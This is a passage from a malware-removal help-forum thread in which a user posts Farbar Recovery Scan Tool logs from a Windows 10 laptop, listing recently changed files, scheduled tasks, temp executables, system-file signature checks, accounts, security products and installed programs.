2016-11-24 20:45 - 2016-11-24 20:58 - 265431973 _____ (© JOY Inc. ) C:\Users\taurus silver\Downloads\GigaSlave_TH_v102_Setup.exe
2016-11-24 18:38 - 2016-11-24 19:02 - 00000000 ____D C:\Gravity
2016-11-23 18:56 - 2016-11-23 20:46 - 1324021267 _____ C:\Users\taurus silver\Downloads\Part 2 MATLAB R2015a (x64) [JawadAhmadNagi.WordPress.com].rar
2016-11-23 18:56 - 2016-11-23 20:37 - 1118681574 _____ C:\Users\taurus silver\Downloads\Part 4 MATLAB R2015a (x64) [JawadAhmadNagi.WordPress.com].rar
2016-11-23 18:56 - 2016-11-23 20:14 - 1094046702 _____ C:\Users\taurus silver\Downloads\Part 3 MATLAB R2015a (x64) [JawadAhmadNagi.WordPress.com].rar
2016-11-19 20:32 - 2016-11-19 20:32 - 00000000 ____D C:\Users\taurus silver\Documents\Elder Scrolls Online
2016-11-19 20:32 - 2016-11-19 20:32 - 00000000 ____D C:\ProgramData\Elder Scrolls Online
2016-11-19 19:56 - 2016-11-19 19:56 - 00000000 ____D C:\WINDOWS\jre
2016-11-19 13:56 - 2016-11-28 04:31 - 00000000 ____D C:\Users\taurus silver\AppData\LocalLow\Mozilla
2016-11-19 04:02 - 2016-11-19 04:02 - 00000003 _____ C:\Users\taurus\HRUPPROG.TXT
2016-11-19 04:02 - 2016-11-19 04:02 - 00000003 _____ C:\Users\taurus\HRUPPROG.EXIT
2016-11-19 04:02 - 2016-11-19 04:02 - 00000000 ____D C:\Users\taurus
2016-11-13 16:28 - 2016-11-13 16:28 - 00000000 ____D C:\Users\taurus silver\AppData\Local\__Ž
2016-11-13 16:27 - 2016-11-13 19:09 - 00000000 ____D C:\Program Files (x86)\Blue Eye Macro
2016-11-13 16:27 - 2016-11-13 19:00 - 00000000 ____D C:\Users\taurus silver\Documents\BlueEye
2016-11-13 16:27 - 2016-11-13 17:14 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blue Eye Macro
2016-11-13 16:27 - 2016-11-13 16:27 - 00000000 ____D C:\ProgramData\Isolated Storage
2016-11-13 15:50 - 2016-11-13 15:50 - 00000000 ____D C:\AeriaGames
2016-11-12 03:18 - 2016-11-12 03:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-11-08 06:49 - 2016-11-08 06:49 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2016-11-08 06:49 - 2016-11-08 06:49 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2016-11-08 06:49 - 2016-11-08 06:49 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2016-11-08 06:49 - 2016-11-08 06:49 - 00042096 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-11-28 04:38 - 2015-07-03 03:36 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\DMCache
2016-11-28 04:34 - 2015-05-25 17:22 - 00004162 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{33D31F93-B81B-40A8-BF53-0277B390E224}
2016-11-28 04:33 - 2016-09-20 18:53 - 00000330 _____ C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job
2016-11-28 04:33 - 2016-06-29 03:26 - 00000500 _____ C:\WINDOWS\Tasks\UCBrowserUpdater.job
2016-11-28 04:32 - 2015-05-29 00:14 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-11-28 04:31 - 2016-08-27 23:19 - 00000000 ____D C:\ProgramData\ASUS Smart Gesture
2016-11-28 04:31 - 2016-05-17 22:57 - 00000946 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job
2016-11-28 04:31 - 2016-03-08 18:57 - 00000402 _____ C:\WINDOWS\Tasks\DriverToolkit Autorun.job
2016-11-28 04:31 - 2015-12-24 12:04 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-11-28 04:31 - 2015-07-14 22:47 - 00000930 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-11-28 04:31 - 2015-02-03 07:21 - 00000165 _____ C:\Users\taurus silver\AppData\Roaming\sp_data.sys
2016-11-28 04:31 - 2015-02-03 07:18 - 00000000 __SHD C:\Users\taurus silver\IntelGraphicsProfiles
2016-11-28 04:30 - 2016-10-21 22:11 - 00000000 ____D C:\Program Files (x86)\Hi-Rez Studios
2016-11-28 04:30 - 2015-12-24 12:28 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-11-28 04:30 - 2015-12-24 12:05 - 00000000 ____D C:\ProgramData\NVIDIA
2016-11-28 04:30 - 2015-10-30 14:28 - 01572864 ___SH C:\WINDOWS\system32\config\BBI
2016-11-28 04:29 - 2015-07-14 22:47 - 00000934 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-11-28 04:28 - 2015-12-24 12:27 - 00880884 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-11-28 04:28 - 2015-10-30 15:21 - 00000000 ____D C:\WINDOWS\INF
2016-11-28 04:20 - 2016-05-12 10:48 - 00262792 _____ (ESET) C:\WINDOWS\system32\Drivers\eamonm.sys
2016-11-28 04:20 - 2016-05-12 10:48 - 00208520 _____ (ESET) C:\WINDOWS\system32\Drivers\epfw.sys
2016-11-28 04:20 - 2016-05-12 10:48 - 00199304 _____ (ESET) C:\WINDOWS\system32\Drivers\edevmon.sys
2016-11-28 04:20 - 2016-05-12 10:48 - 00197248 _____ (ESET) C:\WINDOWS\system32\Drivers\ehdrv.sys
2016-11-28 04:20 - 2016-05-12 10:48 - 00084616 _____ (ESET) C:\WINDOWS\system32\Drivers\epfwwfp.sys
2016-11-28 04:20 - 2016-05-12 10:48 - 00061568 _____ (ESET) C:\WINDOWS\system32\Drivers\epfwlwf.sys
2016-11-28 04:19 - 2016-05-12 10:48 - 00015488 _____ (ESET) C:\WINDOWS\system32\Drivers\eelam.sys
2016-11-28 04:18 - 2016-05-17 22:57 - 00000950 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job
2016-11-28 04:10 - 2015-07-27 07:25 - 00000000 ____D C:\Program Files (x86)\Steam
2016-11-28 04:10 - 2015-07-03 05:19 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\vlc
2016-11-28 04:09 - 2016-09-24 14:04 - 00000968 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3880736737-1765239813-1450978002-1001UA.job
2016-11-28 04:04 - 2015-10-30 15:24 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2016-11-28 03:52 - 2016-04-04 18:43 - 00000320 _____ C:\WINDOWS\Tasks\{55FE86CA-FBAA-C670-0400-2FA61B21F28E}.job
2016-11-28 03:35 - 2015-12-24 12:09 - 00000000 ____D C:\Users\taurus silver
2016-11-28 03:34 - 2015-12-17 10:49 - 00000000 ____D C:\Program Files (x86)\DLL Suite
2016-11-28 03:32 - 2015-07-03 03:36 - 00000000 ____D C:\Users\taurus silver\Downloads\Compressed
2016-11-28 03:17 - 2016-08-24 22:56 - 00000000 ____D C:\Users\taurus silver\AppData\Local\Impksoft
2016-11-28 03:17 - 2016-08-24 22:56 - 00000000 ____D C:\Users\taurus silver\AppData\Local\Atcwworks
2016-11-28 03:11 - 2016-08-27 04:38 - 00000000 ____D C:\Program Files (x86)\Spyware Terminator
2016-11-28 03:00 - 2014-12-04 00:57 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-11-28 03:00 - 2014-12-04 00:57 - 00000000 ____D C:\ProgramData\WildTangent
2016-11-28 02:17 - 2016-08-29 09:21 - 00131584 ___SH C:\Users\taurus silver\Desktop\Thumbs.db
2016-11-28 01:23 - 2016-03-21 05:34 - 00000000 ____D C:\WINDOWS\SysWOW64\directx
2016-11-28 01:22 - 2015-07-09 15:12 - 00040448 ___SH C:\Users\taurus silver\Downloads\Thumbs.db
2016-11-28 00:37 - 2016-01-09 21:03 - 00000000 ____D C:\Program Files (x86)\Tencent
2016-11-28 00:36 - 2016-09-16 23:29 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WhatsApp
2016-11-27 23:33 - 2016-09-20 18:53 - 00002684 _____ C:\WINDOWS\System32\Tasks\UCBrowserUpdaterCore
2016-11-27 23:03 - 2015-12-26 01:37 - 00000000 ____D C:\ProgramData\ProductData
2016-11-27 20:48 - 2015-07-20 04:59 - 00000000 ____D C:\Users\taurus silver\Desktop\Games
2016-11-27 05:27 - 2015-10-30 15:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-11-27 05:25 - 2016-07-24 04:16 - 00000000 ____D C:\KMPlayer
2016-11-27 05:05 - 2015-10-30 15:24 - 00000000 ____D C:\Program Files\WindowsApps
2016-11-27 04:51 - 2015-05-29 00:14 - 00000892 _____ C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job
2016-11-26 18:18 - 2016-06-29 03:26 - 00003540 _____ C:\WINDOWS\System32\Tasks\UCBrowserUpdater
2016-11-26 15:02 - 2015-02-03 07:18 - 00000000 ____D C:\Users\taurus silver\AppData\Local\Packages
2016-11-26 04:06 - 2016-09-24 02:00 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\uTorrent
2016-11-26 01:43 - 2015-08-07 03:35 - 00000000 ____D C:\Users\taurus silver\AppData\Local\Warframe
2016-11-26 01:37 - 2015-08-03 13:49 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-11-25 23:15 - 2015-12-27 18:42 - 00000000 ____D C:\Users\taurus silver\Documents\My Games
2016-11-25 23:14 - 2016-10-21 22:28 - 00000000 ____D C:\Users\taurus silver\AppData\Local\HirezLauncherUI
2016-11-24 22:20 - 2016-09-24 13:27 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-11-24 21:02 - 2013-08-22 21:25 - 00000192 _____ C:\WINDOWS\win.ini
2016-11-24 18:47 - 2016-08-12 20:14 - 00051024 _____ (SoftEther Corporation) C:\WINDOWS\system32\Drivers\SeLow_x64.sys
2016-11-24 18:47 - 2016-08-12 20:13 - 00143816 _____ (SoftEther VPN Project at University of Tsukuba, Japan.) C:\WINDOWS\system32\vpncmd.exe
2016-11-24 18:45 - 2015-06-18 23:40 - 00000000 ____D C:\Users\taurus silver\Desktop\uitm
2016-11-24 18:38 - 2016-03-22 08:57 - 00000000 ____D C:\ProgramData\Solid State Networks
2016-11-23 14:09 - 2016-09-24 14:04 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3880736737-1765239813-1450978002-1001Core.job
2016-11-19 13:55 - 2016-09-24 13:27 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-11-19 09:13 - 2016-10-24 06:25 - 00000000 ____D C:\Users\taurus silver\Desktop\New Folder (3)
2016-11-19 09:10 - 2015-06-22 14:30 - 00000000 ____D C:\Users\taurus silver\AppData\Local\CrashDumps
2016-11-19 04:05 - 2016-08-21 21:58 - 00000000 ____D C:\Users\taurus silver\Desktop\FYP2
2016-11-17 20:24 - 2016-06-29 03:25 - 00000000 ____D C:\Program Files (x86)\UCBrowser
2016-11-13 22:00 - 2015-10-17 14:30 - 00000000 __SHD C:\WINDOWS\SysWOW64\AI_RecycleBin
2016-11-12 19:10 - 2015-05-28 23:20 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\Skype
2016-11-12 03:18 - 2016-05-17 22:57 - 00000000 ____D C:\Program Files (x86)\Dropbox
2016-11-10 15:13 - 2016-05-17 22:57 - 00004010 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineUA
2016-11-10 15:13 - 2016-05-17 22:57 - 00003778 _____ C:\WINDOWS\System32\Tasks\DropboxUpdateTaskMachineCore
2016-11-10 14:30 - 2016-05-15 12:14 - 00002274 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-11-09 11:33 - 2016-04-17 21:45 - 00000000 ____D C:\Users\taurus silver\AppData\Roaming\IDM
2016-11-08 20:32 - 2015-10-30 15:24 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2016-11-08 20:32 - 2015-10-30 15:24 - 00000000 ____D C:\WINDOWS\system32\Macromed
2016-11-08 20:32 - 2015-05-29 00:14 - 00003994 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2016-11-08 02:27 - 2015-09-10 02:26 - 00000000 ____D C:\Users\taurus silver\Documents\PlagiarismCheckerX
 
==================== Files in the root of some directories =======
 
2016-10-24 06:26 - 2016-10-24 06:26 - 0000000 _____ () C:\Users\taurus silver\AppData\Roaming\main.db
2014-11-29 22:40 - 2014-11-29 22:40 - 0025214 _____ () C:\Users\taurus silver\AppData\Roaming\md.owg
2014-11-29 22:40 - 2014-11-29 22:40 - 0000518 _____ () C:\Users\taurus silver\AppData\Roaming\orniiqo.km
2014-11-29 22:40 - 2014-11-29 22:40 - 0018582 _____ () C:\Users\taurus silver\AppData\Roaming\pble.hp
2016-07-03 04:52 - 2016-07-03 04:52 - 3167251 _____ () C:\Users\taurus silver\AppData\Roaming\sb203.dat
2016-06-25 00:55 - 2016-06-25 00:55 - 3163155 _____ () C:\Users\taurus silver\AppData\Roaming\sb234.dat
2016-06-17 00:53 - 2016-06-17 00:53 - 3255827 _____ () C:\Users\taurus silver\AppData\Roaming\sb78.dat
2015-02-03 07:21 - 2016-11-28 04:31 - 0000165 _____ () C:\Users\taurus silver\AppData\Roaming\sp_data.sys
2016-04-04 19:43 - 2016-08-06 00:52 - 0000243 _____ () C:\Users\taurus silver\AppData\Roaming\WB.CFG
2014-11-29 22:40 - 2014-11-29 22:40 - 0022486 _____ () C:\Users\taurus silver\AppData\Roaming\xlcjrlfj.qilo
2016-04-03 18:05 - 2016-04-03 18:15 - 0000126 _____ () C:\Users\taurus silver\AppData\Local\Autosofted License.txt
2015-07-26 07:51 - 2015-07-26 07:51 - 0000017 _____ () C:\Users\taurus silver\AppData\Local\resmon.resmoncfg
2014-11-29 22:40 - 2014-11-29 22:40 - 0010134 _____ () C:\Users\taurus silver\AppData\Local\rvwsegs.fol
2015-09-10 02:23 - 2015-09-10 02:23 - 0000362 _____ () C:\Users\taurus silver\AppData\Local\winconf.pxt
2015-09-19 22:52 - 2015-09-19 22:52 - 0000000 _____ () C:\Users\taurus silver\AppData\Local\{A34834BC-0669-4124-A49F-E789001372E2}
2015-12-24 12:05 - 2015-12-24 12:05 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2016-04-14 15:01 - 2016-04-14 15:01 - 0000121 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2015-02-03 07:08 - 2014-03-26 09:11 - 0000137 _____ () C:\ProgramData\RefreshReg.vbs
2014-12-04 00:56 - 2014-03-27 04:50 - 0000124 _____ () C:\ProgramData\SetStretch.cmd
2014-12-04 00:56 - 2009-07-22 18:04 - 0024576 _____ () C:\ProgramData\SetStretch.exe
2014-12-04 00:56 - 2012-09-07 19:37 - 0000103 _____ () C:\ProgramData\SetStretch.VBS
2015-09-17 06:33 - 2015-09-17 06:33 - 0000102 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
2016-03-31 15:39 - 2016-03-31 15:39 - 0001234 _____ () C:\ProgramData\~0022E94E_src020.tmp
 
Files to move or delete:
====================
C:\ProgramData\RefreshReg.vbs
C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
C:\Windows\Tasks\{55FE86CA-FBAA-C670-0400-2FA61B21F28E}.job
 
 
Some files in TEMP:
====================
C:\Users\taurus silver\AppData\Local\Temp\4e6cf5d72520e51ea54dbf30164d13e3.dll
C:\Users\taurus silver\AppData\Local\Temp\5afbc9abdc05aab6ad80840a9f417d99.dll
C:\Users\taurus silver\AppData\Local\Temp\991b1d78cb2c4c9cf81c2891f02350d2.dll
C:\Users\taurus silver\AppData\Local\Temp\AcDeltree.exe
C:\Users\taurus silver\AppData\Local\Temp\d3f6565ec849e52ee65f426ca3c30f9d.dll
C:\Users\taurus silver\AppData\Local\Temp\FreemakeVideoConverterFull.exe
C:\Users\taurus silver\AppData\Local\Temp\Gw2.exe
C:\Users\taurus silver\AppData\Local\Temp\HiPatchSelfUpdateWindow.exe
C:\Users\taurus silver\AppData\Local\Temp\HiRezLauncherControls.dll
C:\Users\taurus silver\AppData\Local\Temp\HssInstaller.exe
C:\Users\taurus silver\AppData\Local\Temp\jre-8u71-windows-au.exe
C:\Users\taurus silver\AppData\Local\Temp\jre-8u73-windows-au.exe
C:\Users\taurus silver\AppData\Local\Temp\jre-8u77-windows-au.exe
C:\Users\taurus silver\AppData\Local\Temp\KMP_4.1.3.3.exe
C:\Users\taurus silver\AppData\Local\Temp\nvSCPAPI.dll
C:\Users\taurus silver\AppData\Local\Temp\nvSCPAPI64.dll
C:\Users\taurus silver\AppData\Local\Temp\nvSCPAPISvr.exe
C:\Users\taurus silver\AppData\Local\Temp\nvStInst.exe
C:\Users\taurus silver\AppData\Local\Temp\selfupdt.exe
C:\Users\taurus silver\AppData\Local\Temp\SkypeSetup.exe
C:\Users\taurus silver\AppData\Local\Temp\temp~.DLL
C:\Users\taurus silver\AppData\Local\Temp\temp~.EXE
C:\Users\taurus silver\AppData\Local\Temp\Uninstaller-6324.exe
C:\Users\taurus silver\AppData\Local\Temp\UnSigner.exe
C:\Users\taurus silver\AppData\Local\Temp\vlc-2.2.4-win32.exe
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
nointegritychecks: ==> "IntegrityChecks" is disabled. <===== ATTENTION
 
 
LastRegBack: 2016-11-28 00:52
 
==================== End of FRST.txt ============================

  • 0

#3
uwek007

uwek007

    New Member

  • Topic Starter
  • Member
  • Pip
  • 5 posts
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-11-2016
Ran by taurus silver (28-11-2016 04:39:43)
Running from C:\Users\taurus silver\Downloads\Programs
Windows 10 Home Single Language Version 1511 (X64) (2015-12-24 04:36:18)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-3880736737-1765239813-1450978002-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3880736737-1765239813-1450978002-503 - Limited - Disabled)
Guest (S-1-5-21-3880736737-1765239813-1450978002-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3880736737-1765239813-1450978002-1003 - Limited - Enabled)
taurus silver (S-1-5-21-3880736737-1765239813-1450978002-1001 - Administrator - Enabled) => C:\Users\taurus silver
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: ESET Smart Security 9.0.408.0 (Enabled - Out of date) {EC1D6F37-E411-475A-DF50-12FF7FE4AC70}
AS: ESET Smart Security 9.0.408.0 (Enabled - Out of date) {577C8ED3-C22B-48D4-E5E0-298D0463E6CD}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: ESET Personal firewall (Enabled) {D426EE12-AE7E-4602-F40F-BBCA8137EB0B}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
ACA & MEP 2017 Object Enabler (Version: 7.9.45.0 - Autodesk) Hidden
ACAD Private (Version: 21.0.52.0 - Autodesk) Hidden
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Adobe Flash Player 23 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 23.0.0.207 - Adobe Systems Incorporated)
Akamai NetSession Interface (HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Akamai) (Version:  - Akamai Technologies, Inc)
Arduino (HKLM-x32\...\Arduino) (Version: 1.6.5-r5 - Arduino LLC)
ASUS FlipLock (HKLM\...\{7C7F8DAC-8ADA-4B86-BCB6-48B6FFB673DD}) (Version: 1.0.6 - ASUS)
ASUS Product Demo Kit (HKLM-x32\...\{1714AD6E-D517-40C0-9B19-4CE0078F7694}) (Version: 2.0.6 - ASUS)
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 4.0.13 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 3.05.0001 - ASUS)
ASUS USB Charger Plus (HKLM-x32\...\{A859E3E5-C62F-4BFA-AF1D-2B95E03166AF}) (Version: 4.0.2 - ASUS)
ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0037 - ASUS)
AutoCAD 2017 - English (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 Language Pack - English (Version: 21.0.52.0 - Autodesk) Hidden
Autodesk Advanced Material Library Image Library 2017 (HKLM-x32\...\{8ED2ED41-4455-449D-993C-751C039089B9}) (Version: 15.11.3.0 - Autodesk)
Autodesk App Manager 2016-2017 (HKLM-x32\...\{C0954809-F5DC-426C-847E-8409DE14E4C0}) (Version: 2.2.0 - Autodesk)
Autodesk AutoCAD 2017 - English (HKLM\...\AutoCAD 2017 - English) (Version: 21.0.52.0 - Autodesk)
Autodesk AutoCAD Performance Feedback Tool 1.2.5 (HKLM-x32\...\{8600F844-9AA5-412E-B6F2-F9C6CBCFD268}) (Version: 1.2.5.0 - Autodesk)
Autodesk BIM 360 Glue AutoCAD 2017 Add-in 64 bit (HKLM\...\{276A67E0-71EB-4827-B5F7-2ACF02BC1A5B}) (Version: 4.37.6853 - Autodesk)
Autodesk Desktop App (HKLM-x32\...\Autodesk Desktop App) (Version: 6.2.0.174 - Autodesk)
Autodesk Featured Apps 2016-2017 (HKLM-x32\...\{27C15055-713B-4D0E-881F-19598A2DFD59}) (Version: 2.2.0 - Autodesk)
Autodesk License Service (x64) - 3.1 (HKLM\...\{EB6FE58F-8576-4272-BB9C-6B47D9EDFA4D}) (Version: 3.1.26.0 - Autodesk)
Autodesk Material Library 2017 (HKLM-x32\...\{8FB9F735-D64C-4991-8D91-4CDDAB1ABDEE}) (Version: 15.11.3.0 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2017 (HKLM-x32\...\{3FBFBC43-9882-43FA-B979-2D53896747B3}) (Version: 15.11.3.0 - Autodesk)
Autodesk ReCap 360 (HKLM\...\Autodesk ReCap 360) (Version: 3.0.0.52 - Autodesk)
Autodesk ReCap 360 (Version: 3.0.0.52 - Autodesk) Hidden
AVG Web TuneUp (HKLM-x32\...\AVG Web TuneUp) (Version: 4.1.5.143 - AVG Technologies)
BitRaider Streaming Client (HKLM-x32\...\BitRaider Streaming Client) (Version: 1.3.3.4098 - BitRaider, LLC)
Blue Eye Macro 2.61 (HKLM-x32\...\Blue Eye Macro) (Version: 2.61 - )
Cheat Engine 6.5 (HKLM-x32\...\Cheat Engine 6.5_is1) (Version:  - Cheat Engine)
Chromium (HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Chromium) (Version: 46.0.2470.0 - Chromium)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dassault Systemes Software B18 (HKLM\...\Dassault Systemes B18_0) (Version:  - )
Dassault Systemes Software Prerequisites x86-x64 (HKLM\...\{CF1EB598-B424-436A-B15F-B763846BA970}) (Version: 8.1.3 - Dassault Systemes)
Dassault Systemes Software VC9 Prerequisites x86-x64 (HKLM\...\{F2F2DEA7-36AB-4E13-907C-D8BDE775EF97}) (Version: 9.1.2 - Dassault Systemes)
Dev-C++ (HKLM-x32\...\Dev-C++) (Version: 5.11 - Bloodshed Software)
Device Setup (HKLM-x32\...\{1F07F2C7-596F-4F34-B805-2C61A3E50E5A}) (Version: 1.0.18 - ASUSTek Computer Inc.)
DLL Suite 9.0 (HKLM-x32\...\{E557052E-9828-40E4-BFF6-311D3E89DB81}_is1) (Version: 9.0.0.0 - )
Dropbox (HKLM-x32\...\Dropbox) (Version: 14.4.19 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.57.1 - Dropbox, Inc.) Hidden
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
ESET Smart Security (HKLM\...\{BA1050B5-E274-4693-8A67-CAF5576A07F1}) (Version: 9.0.381.0 - ESET, spol. s r.o.)
ExpressCache (HKLM\...\{44EAE7F6-8BBF-4C3F-A573-3CD5A3C067FA}) (Version: 1.3.110.0 - Condusiv Technologies)
Freemake Video Converter version 4.1.9 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.9 - Ellora Assets Corporation)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Talk Plugin (HKLM-x32\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 5.41.3.0 - Google)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Guild Wars 2 (HKLM\...\Guild Wars 2) (Version:  - NCsoft Corporation, Ltd.)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.7.4 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Intel Collaborative Processor Performance Control (HKLM-x32\...\0E7DAF70-FB54-4B91-B192-7E771C25AEEB) (Version: 1.0.0.1016 - Intel Corporation)
Intel® Chipset Device Software (x32 Version: 10.0.20 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.28.1006 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4013 - Intel Corporation)
Intel® Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 1.1.226.0 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
KMPlayer (remove only) (HKLM-x32\...\The KMPlayer) (Version: 4.1.3.3 - PandoraTV)
Logitech Gaming Software 5.10 (HKLM\...\{1444D2EE-C7AD-44A8-844F-2634B49353D1}) (Version: 5.10.127 - Logitech)
Macro Recorder 5.8.0 (HKLM-x32\...\Macro Recorder_is1) (Version: 5.8.0 - Jitbit Software)
Maxx Audio Installer (x64) (Version: 1.6.4882.94 - Waves Audio Ltd.) Hidden
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProplusRetail - en-us) (Version: 16.0.4229.1002 - Microsoft Corporation)
Microsoft Project Professional 2016 - en-us (HKLM\...\ProjectProRetail - en-us) (Version: 16.0.4229.1002 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visio Professional 2016 - en-us (HKLM\...\VisioProRetail - en-us) (Version: 16.0.4229.1002 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
